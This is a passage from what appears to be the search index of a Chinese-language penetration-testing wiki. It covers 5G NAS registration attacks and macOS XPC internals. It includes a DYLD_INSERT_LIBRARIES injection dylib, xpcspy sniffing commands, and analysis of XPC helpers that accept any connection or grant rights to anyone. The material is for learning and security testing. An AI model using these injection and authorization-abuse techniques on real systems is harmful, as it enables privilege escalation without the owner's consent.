gNB,或测试台)允许多种攻击路径。 Registration flow (简化): Registration Request: UE 发送 SUCI (加密的 SUPI) 和能力信息。 Authentication: AMF/AUSF 发送 RAND/AUTN;UE 返回 RES*。 Security Mode Command/Complete: 协商并激活 NAS 完整性和加密。 PDU Session Establishment: IP/QoS 配置。 实验室配置建议(非 RF): Core: Open5GS 的默认部署足以重现流程。 UE: 模拟器或测试 UE;使用 Wireshark 解码。 Active tooling: 5GReplay (捕获/修改/重放 NGAP 内的 NAS), Sni5Gect (在不启动完整 rogue gNB 的情况下实时嗅探/修补/注入 NAS)。 在 Wireshark 中有用的 display filters: ngap.procedure_code == 15 (InitialUEMessage) nas_5g.message_type == 65 or nas-5gs.message_type == 65 (Registration Request)","breadcrumbs":"Pentesting Network » Telecom Network Exploitation » 9. 5G NAS Registration Attacks: SUCI leaks, downgrade to EEA0/EIA0, and NAS replay","id":"243","title":"9. 5G NAS Registration Attacks: SUCI leaks, downgrade to EEA0/EIA0, and NAS replay"},"2430":{"body":"应用程序的 XPC 组件是 在应用程序内部 。例如,在 Safari 中,您可以在 /Applications/Safari.app/Contents/XPCServices 找到它们。它们的扩展名为 .xpc (如 com.apple.Safari.SandboxBroker.xpc ),并且 也与主二进制文件捆绑 在一起:/Applications/Safari.app/Contents/XPCServices/com.apple.Safari.SandboxBroker.xpc/Contents/MacOS/com.apple.Safari.SandboxBroker 和 Info.plist: /Applications/Safari.app/Contents/XPCServices/com.apple.Safari.SandboxBroker.xpc/Contents/Info.plist 正如您可能想到的, XPC 组件将具有不同的权限和特权 ,与其他 XPC 组件或主应用程序二进制文件不同。除非 XPC 服务在其 Info.plist 文件中配置了 JoinExistingSession 设置为“True”。在这种情况下,XPC 服务将在 与调用它的应用程序相同的安全会话中 运行。 XPC 服务由 launchd 在需要时 启动 ,并在所有任务 完成 后 关闭 以释放系统资源。 应用特定的 XPC 组件只能被应用程序使用 ,从而降低了与潜在漏洞相关的风险。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » 应用特定的 XPC 服务","id":"2430","title":"应用特定的 XPC 服务"},"2431":{"body":"系统范围的 XPC 服务对所有用户可用。这些服务,无论是 launchd 还是 Mach 类型,都需要在指定目录中的 plist 文件中 定义 ,例如 /System/Library/LaunchDaemons 、 /Library/LaunchDaemons 、 /System/Library/LaunchAgents 或 /Library/LaunchAgents 。 这些 plist 文件将具有一个名为 MachServices 的键,包含服务的名称,以及一个名为 Program 的键,包含二进制文件的路径: xml cat /Library/LaunchDaemons/com.jamf.management.daemon.plist \\n\\n\\n\\nProgram\\n/Library/Application Support/JAMF/Jamf.app/Contents/MacOS/JamfDaemon.app/Contents/MacOS/JamfDaemon\\nAbandonProcessGroup\\n\\nKeepAlive\\n\\nLabel\\ncom.jamf.management.daemon\\nMachServices\\n\\ncom.jamf.management.daemon.aad\\n\\ncom.jamf.management.daemon.agent\\n\\ncom.jamf.management.daemon.binary\\n\\ncom.jamf.management.daemon.selfservice\\n\\ncom.jamf.management.daemon.service\\n\\n\\nRunAtLoad\\n\\n\\n LaunchDameons 中的进程由 root 运行。因此,如果一个无权限的进程能够与其中一个进程通信,它可能能够提升权限。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » 系统范围的 XPC 服务","id":"2431","title":"系统范围的 XPC 服务"},"2432":{"body":"xpc_object_t 每个 XPC 消息都是一个字典对象,简化了序列化和反序列化。此外,libxpc.dylib 声明了大多数数据类型,因此可以确保接收到的数据是预期的类型。在 C API 中,每个对象都是 xpc_object_t(其类型可以使用 xpc_get_type(object) 检查)。 此外,函数 xpc_copy_description(object) 可用于获取对象的字符串表示,这对于调试目的非常有用。 这些对象还具有一些可调用的方法,如 xpc__copy、xpc__equal、xpc__hash、xpc__serialize、xpc__deserialize... xpc_object_t 是通过调用 xpc__create 函数创建的,该函数内部调用 _xpc_base_create(Class, Size),其中指明了对象的类类型(XPC_TYPE_* 之一)和大小(额外的 40B 将被添加到大小以存储元数据)。这意味着对象的数据将从偏移量 40B 开始。 因此,xpc__t 是 xpc_object_t 的一种子类,而 xpc_object_t 则是 os_object_t* 的子类。 warning 请注意,使用 xpc_dictionary_[get/set]_ 获取或设置键的类型和实际值的应该是开发者。 xpc_pipe xpc_pipe 是一个 FIFO 管道,进程可以用来进行通信(通信使用 Mach 消息)。 可以通过调用 xpc_pipe_create() 或 xpc_pipe_create_from_port() 创建 XPC 服务器,后者使用特定的 Mach 端口创建它。然后,可以调用 xpc_pipe_receive 和 xpc_pipe_try_receive 来接收消息。 请注意, xpc_pipe 对象是一个 xpc_object_t ,其结构中包含有关使用的两个 Mach 端口和名称(如果有的话)的信息。例如,守护进程 secinitd 在其 plist /System/Library/LaunchDaemons/com.apple.secinitd.plist 中配置了名为 com.apple.secinitd 的管道。 xpc_pipe 的一个示例是 launchd 创建的 bootstrap pipe ,使得共享 Mach 端口成为可能。 NSXPC* 这些是 Objective-C 高级对象,允许对 XPC 连接进行抽象。 此外,使用 DTrace 调试这些对象比前面的对象更容易。 GCD 队列 XPC 使用 GCD 传递消息,此外它生成某些调度队列,如 xpc.transactionq、xpc.io、xpc-events.add-listenerq、xpc.service-instance...","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » XPC 对象","id":"2432","title":"XPC 对象"},"2433":{"body":"这些是位于其他项目的 XPCServices 文件夹中的 .xpc 扩展包,在 Info.plist 中,它们的 CFBundlePackageType 设置为 XPC! 。 该文件具有其他配置键,如 ServiceType,可以是 Application、User、System 或 _SandboxProfile,可以定义沙箱或 _AllowedClients,可能指示联系服务所需的权限或 ID。这些和其他配置选项在服务启动时将有助于配置服务。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » XPC 服务","id":"2433","title":"XPC 服务"},"2434":{"body":"应用程序尝试使用 xpc_connection_create_mach_service 连接 到 XPC 服务,然后 launchd 定位守护进程并启动 xpcproxy 。 xpcproxy 强制执行配置的限制,并使用提供的 FDs 和 Mach 端口生成服务。 为了提高 XPC 服务搜索的速度,使用了缓存。 可以使用以下方法跟踪 xpcproxy 的操作: bash supraudit S -C -o /tmp/output /dev/auditpipe XPC库使用kdebug记录调用xpc_ktrace_pid0和xpc_ktrace_pid1的操作。它使用的代码没有文档,因此需要将其添加到/usr/share/misc/trace.codes中。它们的前缀是0x29,例如其中一个是0x29000004:XPC_serializer_pack。 实用程序xpcproxy使用前缀0x22,例如:0x2200001c: xpcproxy:will_do_preexec。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » 启动服务","id":"2434","title":"启动服务"},"2435":{"body":"应用程序可以 订阅 不同的事件 消息 ,使其能够在发生此类事件时 按需启动 。这些服务的 设置 在 launchd plist文件 中完成,位于 与之前相同的目录 中,并包含一个额外的**LaunchEvent**键。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » XPC事件消息","id":"2435","title":"XPC事件消息"},"2436":{"body":"当一个进程尝试通过XPC连接调用一个方法时, XPC服务应该检查该进程是否被允许连接 。以下是检查的常见方法和常见陷阱: macOS XPC Connecting Process Check","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » XPC连接进程检查","id":"2436","title":"XPC连接进程检查"},"2437":{"body":"苹果还允许应用程序 配置一些权限以及如何获取它们 ,因此如果调用进程拥有这些权限,它将 被允许调用 XPC服务中的方法: macOS XPC Authorization","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » XPC授权","id":"2437","title":"XPC授权"},"2438":{"body":"要嗅探XPC消息,可以使用 xpcspy ,它使用 Frida 。 bash # Install\\npip3 install xpcspy\\npip3 install xpcspy --no-deps # To not make xpcspy install Frida 15 and downgrade your Frida installation # Start sniffing\\nxpcspy -U -r -W \\n## Using filters (i: for input, o: for output)\\nxpcspy -U -t \'i:com.apple.*\' -t \'o:com.apple.*\' -r 另一个可能使用的工具是 XPoCe2 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » XPC嗅探器","id":"2438","title":"XPC嗅探器"},"2439":{"body":"xpc_server.c\\nxpc_client.c\\nxyz.hacktricks.service.plist c // gcc xpc_server.c -o xpc_server #include static void handle_event(xpc_object_t event) {\\nif (xpc_get_type(event) == XPC_TYPE_DICTIONARY) {\\n// Print received message\\nconst char* received_message = xpc_dictionary_get_string(event, \\"message\\");\\nprintf(\\"Received message: %s\\\\n\\", received_message); // Create a response dictionary\\nxpc_object_t response = xpc_dictionary_create(NULL, NULL, 0);\\nxpc_dictionary_set_string(response, \\"received\\", \\"received\\"); // Send response\\nxpc_connection_t remote = xpc_dictionary_get_remote_connection(event);\\nxpc_connection_send_message(remote, response); // Clean up\\nxpc_release(response);\\n}\\n} static void handle_connection(xpc_connection_t connection) {\\nxpc_connection_set_event_handler(connection, ^(xpc_object_t event) {\\nhandle_event(event);\\n});\\nxpc_connection_resume(connection);\\n} int main(int argc, const char *argv[]) {\\nxpc_connection_t service = xpc_connection_create_mach_service(\\"xyz.hacktricks.service\\",\\ndispatch_get_main_queue(),\\nXPC_CONNECTION_MACH_SERVICE_LISTENER);\\nif (!service) {\\nfprintf(stderr, \\"Failed to create service.\\\\n\\");\\nexit(EXIT_FAILURE);\\n} xpc_connection_set_event_handler(service, ^(xpc_object_t event) {\\nxpc_type_t type = xpc_get_type(event);\\nif (type == XPC_TYPE_CONNECTION) {\\nhandle_connection(event);\\n}\\n}); xpc_connection_resume(service);\\ndispatch_main(); return 0;\\n} c // gcc xpc_client.c -o xpc_client #include int main(int argc, const char *argv[]) {\\nxpc_connection_t connection = xpc_connection_create_mach_service(\\"xyz.hacktricks.service\\", NULL, XPC_CONNECTION_MACH_SERVICE_PRIVILEGED); xpc_connection_set_event_handler(connection, ^(xpc_object_t event) {\\nif (xpc_get_type(event) == XPC_TYPE_DICTIONARY) {\\n// Print received message\\nconst char* received_message = xpc_dictionary_get_string(event, \\"received\\");\\nprintf(\\"Received message: %s\\\\n\\", received_message);\\n}\\n}); xpc_connection_resume(connection); xpc_object_t message = xpc_dictionary_create(NULL, NULL, 0);\\nxpc_dictionary_set_string(message, \\"message\\", \\"Hello, Server!\\"); xpc_connection_send_message(connection, message); dispatch_main(); return 0;\\n} xml \\n \\n\\nLabel\\nxyz.hacktricks.service\\nMachServices\\n\\nxyz.hacktricks.service\\n\\n\\nProgram\\n/tmp/xpc_server\\nProgramArguments\\n\\n/tmp/xpc_server\\n\\n\\n bash # Compile the server & client\\ngcc xpc_server.c -o xpc_server\\ngcc xpc_client.c -o xpc_client # Save server on it\'s location\\ncp xpc_server /tmp # Load daemon\\nsudo cp xyz.hacktricks.service.plist /Library/LaunchDaemons\\nsudo launchctl load /Library/LaunchDaemons/xyz.hacktricks.service.plist # Call client\\n./xpc_client # Clean\\nsudo launchctl unload /Library/LaunchDaemons/xyz.hacktricks.service.plist\\nsudo rm /Library/LaunchDaemons/xyz.hacktricks.service.plist /tmp/xpc_server","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » XPC 通信 C 代码示例","id":"2439","title":"XPC 通信 C 代码示例"},"244":{"body":"预期行为:UE/USIM 必须发送 SUCI(使用家庭网络公钥加密的 SUPI)。如果在 Registration Request 中发现明文 SUPI/IMSI,则表示存在隐私缺陷,可能导致持久的用户追踪。 如何测试: 捕获 InitialUEMessage 中的首个 NAS 消息并检查 Mobile Identity IE。 Wireshark 快速检查: 它应该解码为 SUCI,而不是 IMSI。 过滤示例:nas-5gs.mobile_identity.suci || nas_5g.mobile_identity.suci 应存在;若不存在且同时出现 imsi 则表明泄露。 需要收集的信息: 如果被暴露,记录 MCC/MNC/MSIN;按 UE 记录并在不同时间/位置间跟踪。 缓解措施: 强制只允许 SUCI 的 UE/USIM;对任何出现在初始 NAS 中的 IMSI/SUPI 发出告警。","breadcrumbs":"Pentesting Network » Telecom Network Exploitation » 9.1 标识符隐私: SUCI 故障导致暴露 SUPI/IMSI","id":"244","title":"9.1 标识符隐私: SUCI 故障导致暴露 SUPI/IMSI"},"2440":{"body":"oc_xpc_server.m\\noc_xpc_client.m\\nxyz.hacktricks.svcoc.plist objectivec // gcc -framework Foundation oc_xpc_server.m -o oc_xpc_server\\n#include @protocol MyXPCProtocol\\n- (void)sayHello:(NSString *)some_string withReply:(void (^)(NSString *))reply;\\n@end @interface MyXPCObject : NSObject \\n@end @implementation MyXPCObject\\n- (void)sayHello:(NSString *)some_string withReply:(void (^)(NSString *))reply {\\nNSLog(@\\"Received message: %@\\", some_string);\\nNSString *response = @\\"Received\\";\\nreply(response);\\n}\\n@end @interface MyDelegate : NSObject \\n@end @implementation MyDelegate - (BOOL)listener:(NSXPCListener *)listener shouldAcceptNewConnection:(NSXPCConnection *)newConnection {\\nnewConnection.exportedInterface = [NSXPCInterface interfaceWithProtocol:@protocol(MyXPCProtocol)]; MyXPCObject *my_object = [MyXPCObject new]; newConnection.exportedObject = my_object; [newConnection resume];\\nreturn YES;\\n}\\n@end int main(void) { NSXPCListener *listener = [[NSXPCListener alloc] initWithMachServiceName:@\\"xyz.hacktricks.svcoc\\"]; id delegate = [MyDelegate new];\\nlistener.delegate = delegate;\\n[listener resume]; sleep(10); // Fake something is done and then it ends\\n} objectivec // gcc -framework Foundation oc_xpc_client.m -o oc_xpc_client\\n#include @protocol MyXPCProtocol\\n- (void)sayHello:(NSString *)some_string withReply:(void (^)(NSString *))reply;\\n@end int main(void) {\\nNSXPCConnection *connection = [[NSXPCConnection alloc] initWithMachServiceName:@\\"xyz.hacktricks.svcoc\\" options:NSXPCConnectionPrivileged];\\nconnection.remoteObjectInterface = [NSXPCInterface interfaceWithProtocol:@protocol(MyXPCProtocol)];\\n[connection resume]; [[connection remoteObjectProxy] sayHello:@\\"Hello, Server!\\" withReply:^(NSString *response) {\\nNSLog(@\\"Received response: %@\\", response);\\n}]; [[NSRunLoop currentRunLoop] run]; return 0;\\n} xml \\n \\n\\nLabel\\nxyz.hacktricks.svcoc\\nMachServices\\n\\nxyz.hacktricks.svcoc\\n\\n\\nProgram\\n/tmp/oc_xpc_server\\nProgramArguments\\n\\n/tmp/oc_xpc_server\\n\\n\\n bash # Compile the server & client\\ngcc -framework Foundation oc_xpc_server.m -o oc_xpc_server\\ngcc -framework Foundation oc_xpc_client.m -o oc_xpc_client # Save server on it\'s location\\ncp oc_xpc_server /tmp # Load daemon\\nsudo cp xyz.hacktricks.svcoc.plist /Library/LaunchDaemons\\nsudo launchctl load /Library/LaunchDaemons/xyz.hacktricks.svcoc.plist # Call client\\n./oc_xpc_client # Clean\\nsudo launchctl unload /Library/LaunchDaemons/xyz.hacktricks.svcoc.plist\\nsudo rm /Library/LaunchDaemons/xyz.hacktricks.svcoc.plist /tmp/oc_xpc_server","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » XPC 通信 Objective-C 代码示例","id":"2440","title":"XPC 通信 Objective-C 代码示例"},"2441":{"body":"objectivec // gcc -dynamiclib -framework Foundation oc_xpc_client.m -o oc_xpc_client.dylib\\n// gcc injection example:\\n// DYLD_INSERT_LIBRARIES=oc_xpc_client.dylib /path/to/vuln/bin #import @protocol MyXPCProtocol\\n- (void)sayHello:(NSString *)some_string withReply:(void (^)(NSString *))reply;\\n@end __attribute__((constructor))\\nstatic void customConstructor(int argc, const char **argv)\\n{\\nNSString* _serviceName = @\\"xyz.hacktricks.svcoc\\"; NSXPCConnection* _agentConnection = [[NSXPCConnection alloc] initWithMachServiceName:_serviceName options:4096]; [_agentConnection setRemoteObjectInterface:[NSXPCInterface interfaceWithProtocol:@protocol(MyXPCProtocol)]]; [_agentConnection resume]; [[_agentConnection remoteObjectProxyWithErrorHandler:^(NSError* error) {\\n(void)error;\\nNSLog(@\\"Connection Failure\\");\\n}] sayHello:@\\"Hello, Server!\\" withReply:^(NSString *response) {\\nNSLog(@\\"Received response: %@\\", response);\\n} ];\\nNSLog(@\\"Done!\\"); return;\\n}","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » 客户端在 Dylb 代码中","id":"2441","title":"客户端在 Dylb 代码中"},"2442":{"body":"此功能由 RemoteXPC.framework(来自 libxpc)提供,允许通过不同主机之间的 XPC 进行通信。 支持远程 XPC 的服务将在其 plist 中具有键 UsesRemoteXPC,就像 /System/Library/LaunchDaemons/com.apple.SubmitDiagInfo.plist 的情况一样。然而,尽管该服务将与 launchd 注册,但提供该功能的是 UserEventAgent,其插件为 com.apple.remoted.plugin 和 com.apple.remoteservicediscovery.events.plugin。 此外,RemoteServiceDiscovery.framework 允许从 com.apple.remoted.plugin 获取信息,暴露出如 get_device、get_unique_device、connect 等函数... 一旦使用 connect 并收集到服务的 socket fd,就可以使用 remote_xpc_connection_* 类。 可以使用 cli 工具 /usr/libexec/remotectl 获取有关远程服务的信息,使用的参数包括: bash /usr/libexec/remotectl list # Get bridge devices\\n/usr/libexec/remotectl show ...# Get device properties and services\\n/usr/libexec/remotectl dumpstate # Like dump withuot indicateing a servie\\n/usr/libexec/remotectl [netcat|relay] ... # Expose a service in a port\\n... BridgeOS与主机之间的通信通过专用的IPv6接口进行。MultiverseSupport.framework允许建立套接字,其fd将用于通信。 可以使用netstat、nettop或开源选项netbottom找到这些通信。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » Remote XPC","id":"2442","title":"Remote XPC"},"2443":{"body":"Reading time: 17 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Authorization » macOS XPC 授权","id":"2443","title":"macOS XPC 授权"},"2444":{"body":"苹果还提出了另一种方法来验证连接进程是否具有 调用暴露的 XPC 方法的权限 。 当应用程序需要 以特权用户身份执行操作 时,它通常不会以特权用户身份运行,而是作为 root 安装一个 HelperTool 作为 XPC 服务,可以从应用程序调用以执行这些操作。然而,调用该服务的应用程序应该具有足够的授权。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Authorization » XPC 授权","id":"2444","title":"XPC 授权"},"2445":{"body":"一个例子可以在 EvenBetterAuthorizationSample 中找到。在 App/AppDelegate.m 中,它尝试 连接 到 HelperTool 。而在 HelperTool/HelperTool.m 中,函数 shouldAcceptNewConnection 不会检查 之前提到的任何要求。它将始终返回 YES: objectivec - (BOOL)listener:(NSXPCListener *)listener shouldAcceptNewConnection:(NSXPCConnection *)newConnection\\n// Called by our XPC listener when a new connection comes in. We configure the connection\\n// with our protocol and ourselves as the main object.\\n{\\nassert(listener == self.listener);\\n#pragma unused(listener)\\nassert(newConnection != nil); newConnection.exportedInterface = [NSXPCInterface interfaceWithProtocol:@protocol(HelperToolProtocol)];\\nnewConnection.exportedObject = self;\\n[newConnection resume]; return YES;\\n} 有关如何正确配置此检查的更多信息: macOS XPC Connecting Process Check","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Authorization » ShouldAcceptNewConnection 始终为 YES","id":"2445","title":"ShouldAcceptNewConnection 始终为 YES"},"2446":{"body":"然而,当调用 HelperTool 中的方法时,确实会进行一些 授权 。 App/AppDelegate.m 中的 applicationDidFinishLaunching 函数将在应用程序启动后创建一个空的授权引用。这应该始终有效。 然后,它将尝试通过调用 setupAuthorizationRights 来 添加一些权限 到该授权引用: objectivec - (void)applicationDidFinishLaunching:(NSNotification *)note\\n{\\n[...]\\nerr = AuthorizationCreate(NULL, NULL, 0, &self->_authRef);\\nif (err == errAuthorizationSuccess) {\\nerr = AuthorizationMakeExternalForm(self->_authRef, &extForm);\\n}\\nif (err == errAuthorizationSuccess) {\\nself.authorization = [[NSData alloc] initWithBytes:&extForm length:sizeof(extForm)];\\n}\\nassert(err == errAuthorizationSuccess); // If we successfully connected to Authorization Services, add definitions for our default\\n// rights (unless they\'re already in the database). if (self->_authRef) {\\n[Common setupAuthorizationRights:self->_authRef];\\n} [self.window makeKeyAndOrderFront:self];\\n} 函数 setupAuthorizationRights 来自 Common/Common.m,将把应用程序的权限存储在授权数据库 /var/db/auth.db 中。请注意,它只会添加尚未在数据库中的权限: objectivec + (void)setupAuthorizationRights:(AuthorizationRef)authRef\\n// See comment in header.\\n{\\nassert(authRef != NULL);\\n[Common enumerateRightsUsingBlock:^(NSString * authRightName, id authRightDefault, NSString * authRightDesc) {\\nOSStatus blockErr; // First get the right. If we get back errAuthorizationDenied that means there\'s\\n// no current definition, so we add our default one. blockErr = AuthorizationRightGet([authRightName UTF8String], NULL);\\nif (blockErr == errAuthorizationDenied) {\\nblockErr = AuthorizationRightSet(\\nauthRef, // authRef\\n[authRightName UTF8String], // rightName\\n(__bridge CFTypeRef) authRightDefault, // rightDefinition\\n(__bridge CFStringRef) authRightDesc, // descriptionKey\\nNULL, // bundle (NULL implies main bundle)\\nCFSTR(\\"Common\\") // localeTableName\\n);\\nassert(blockErr == errAuthorizationSuccess);\\n} else {\\n// A right already exists (err == noErr) or any other error occurs, we\\n// assume that it has been set up in advance by the system administrator or\\n// this is the second time we\'ve run. Either way, there\'s nothing more for\\n// us to do.\\n}\\n}];\\n} 函数 enumerateRightsUsingBlock 用于获取在 commandInfo 中定义的应用程序权限: objectivec static NSString * kCommandKeyAuthRightName = @\\"authRightName\\";\\nstatic NSString * kCommandKeyAuthRightDefault = @\\"authRightDefault\\";\\nstatic NSString * kCommandKeyAuthRightDesc = @\\"authRightDescription\\"; + (NSDictionary *)commandInfo\\n{\\nstatic dispatch_once_t sOnceToken;\\nstatic NSDictionary * sCommandInfo; dispatch_once(&sOnceToken, ^{\\nsCommandInfo = @{\\nNSStringFromSelector(@selector(readLicenseKeyAuthorization:withReply:)) : @{\\nkCommandKeyAuthRightName : @\\"com.example.apple-samplecode.EBAS.readLicenseKey\\",\\nkCommandKeyAuthRightDefault : @kAuthorizationRuleClassAllow,\\nkCommandKeyAuthRightDesc : NSLocalizedString(\\n@\\"EBAS is trying to read its license key.\\",\\n@\\"prompt shown when user is required to authorize to read the license key\\"\\n)\\n},\\nNSStringFromSelector(@selector(writeLicenseKey:authorization:withReply:)) : @{\\nkCommandKeyAuthRightName : @\\"com.example.apple-samplecode.EBAS.writeLicenseKey\\",\\nkCommandKeyAuthRightDefault : @kAuthorizationRuleAuthenticateAsAdmin,\\nkCommandKeyAuthRightDesc : NSLocalizedString(\\n@\\"EBAS is trying to write its license key.\\",\\n@\\"prompt shown when user is required to authorize to write the license key\\"\\n)\\n},\\nNSStringFromSelector(@selector(bindToLowNumberPortAuthorization:withReply:)) : @{\\nkCommandKeyAuthRightName : @\\"com.example.apple-samplecode.EBAS.startWebService\\",\\nkCommandKeyAuthRightDefault : @kAuthorizationRuleClassAllow,\\nkCommandKeyAuthRightDesc : NSLocalizedString(\\n@\\"EBAS is trying to start its web service.\\",\\n@\\"prompt shown when user is required to authorize to start the web service\\"\\n)\\n}\\n};\\n});\\nreturn sCommandInfo;\\n} + (NSString *)authorizationRightForCommand:(SEL)command\\n// See comment in header.\\n{\\nreturn [self commandInfo][NSStringFromSelector(command)][kCommandKeyAuthRightName];\\n} + (void)enumerateRightsUsingBlock:(void (^)(NSString * authRightName, id authRightDefault, NSString * authRightDesc))block\\n// Calls the supplied block with information about each known authorization right..\\n{\\n[self.commandInfo enumerateKeysAndObjectsUsingBlock:^(id key, id obj, BOOL *stop) {\\n#pragma unused(key)\\n#pragma unused(stop)\\nNSDictionary * commandDict;\\nNSString * authRightName;\\nid authRightDefault;\\nNSString * authRightDesc; // If any of the following asserts fire it\'s likely that you\'ve got a bug\\n// in sCommandInfo. commandDict = (NSDictionary *) obj;\\nassert([commandDict isKindOfClass:[NSDictionary class]]); authRightName = [commandDict objectForKey:kCommandKeyAuthRightName];\\nassert([authRightName isKindOfClass:[NSString class]]); authRightDefault = [commandDict objectForKey:kCommandKeyAuthRightDefault];\\nassert(authRightDefault != nil); authRightDesc = [commandDict objectForKey:kCommandKeyAuthRightDesc];\\nassert([authRightDesc isKindOfClass:[NSString class]]); block(authRightName, authRightDefault, authRightDesc);\\n}];\\n} 这意味着在这个过程结束时,commandInfo 中声明的权限将存储在 /var/db/auth.db 中。请注意,您可以找到 每种方法 需要 身份验证 、 权限名称 和 kCommandKeyAuthRightDefault 。后者 指示谁可以获得此权限 。 有不同的范围来指示谁可以访问某个权限。其中一些在 AuthorizationDB.h 中定义(您可以在 这里找到所有内容 ),但总结如下: 名称值描述kAuthorizationRuleClassAllowallow任何人kAuthorizationRuleClassDenydeny没有人kAuthorizationRuleIsAdminis-admin当前用户需要是管理员(在管理员组内)kAuthorizationRuleAuthenticateAsSessionUserauthenticate-session-owner要求用户进行身份验证。kAuthorizationRuleAuthenticateAsAdminauthenticate-admin要求用户进行身份验证。他需要是管理员(在管理员组内)kAuthorizationRightRulerule指定规则kAuthorizationCommentcomment指定一些关于权限的额外评论","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Authorization » 应用程序权限","id":"2446","title":"应用程序权限"},"2447":{"body":"在 HelperTool/HelperTool.m 中,函数 readLicenseKeyAuthorization 检查调用者是否被授权 执行此方法 ,通过调用函数 checkAuthorization 。该函数将检查调用进程发送的 authData 是否具有 正确格式 ,然后检查 获取调用特定方法的权限所需的内容 。如果一切顺利, 返回的 error 将为 nil : objectivec - (NSError *)checkAuthorization:(NSData *)authData command:(SEL)command\\n{\\n[...] // First check that authData looks reasonable. error = nil;\\nif ( (authData == nil) || ([authData length] != sizeof(AuthorizationExternalForm)) ) {\\nerror = [NSError errorWithDomain:NSOSStatusErrorDomain code:paramErr userInfo:nil];\\n} // Create an authorization ref from that the external form data contained within. if (error == nil) {\\nerr = AuthorizationCreateFromExternalForm([authData bytes], &authRef); // Authorize the right associated with the command. if (err == errAuthorizationSuccess) {\\nAuthorizationItem oneRight = { NULL, 0, NULL, 0 };\\nAuthorizationRights rights = { 1, &oneRight }; oneRight.name = [[Common authorizationRightForCommand:command] UTF8String];\\nassert(oneRight.name != NULL); err = AuthorizationCopyRights(\\nauthRef,\\n&rights,\\nNULL,\\nkAuthorizationFlagExtendRights | kAuthorizationFlagInteractionAllowed,\\nNULL\\n);\\n}\\nif (err != errAuthorizationSuccess) {\\nerror = [NSError errorWithDomain:NSOSStatusErrorDomain code:err userInfo:nil];\\n}\\n} if (authRef != NULL) {\\njunk = AuthorizationFree(authRef, 0);\\nassert(junk == errAuthorizationSuccess);\\n} return error;\\n} 注意,要 检查获取调用该方法的权限 ,函数 authorizationRightForCommand 只会检查之前的评论对象 commandInfo 。然后,它将调用 AuthorizationCopyRights 来检查 是否具有调用该函数的权限 (注意,标志允许与用户交互)。 在这种情况下,要调用函数 readLicenseKeyAuthorization,kCommandKeyAuthRightDefault 被定义为 @kAuthorizationRuleClassAllow。因此, 任何人都可以调用它 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Authorization » 权限验证","id":"2447","title":"权限验证"},"2448":{"body":"提到这些信息存储在 /var/db/auth.db。您可以使用以下命令列出所有存储的规则: sql sudo sqlite3 /var/db/auth.db\\nSELECT name FROM rules;\\nSELECT name FROM rules WHERE name LIKE \'%safari%\'; 然后,您可以通过以下方式查看谁可以访问该权限: bash security authorizationdb read com.apple.safaridriver.allow","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC Authorization » DB 信息","id":"2448","title":"DB 信息"},"2449":{"body":"您可以在 这里 找到 所有权限配置 ,但不需要用户交互的组合如下: \'authenticate-user\': \'false\' 这是最直接的键。如果设置为false,则表示用户不需要提供身份验证即可获得此权限。 这与下面的两个中的一个或指示用户必须属于的组结合使用。 \'allow-root\': \'true\' 如果用户以根用户身份操作(具有提升的权限),并且此键设置为true,则根用户可能在没有进一步身份验证的情况下获得此权限。然而,通常情况下,获得根用户状态已经需要身份验证,因此对于大多数用户来说,这并不是一个“无身份验证”的场景。 \'session-owner\': \'true\' 如果设置为true,会话的所有者(当前登录的用户)将自动获得此权限。如果用户已经登录,这可能会绕过额外的身份验证。 \'shared\': \'true\' 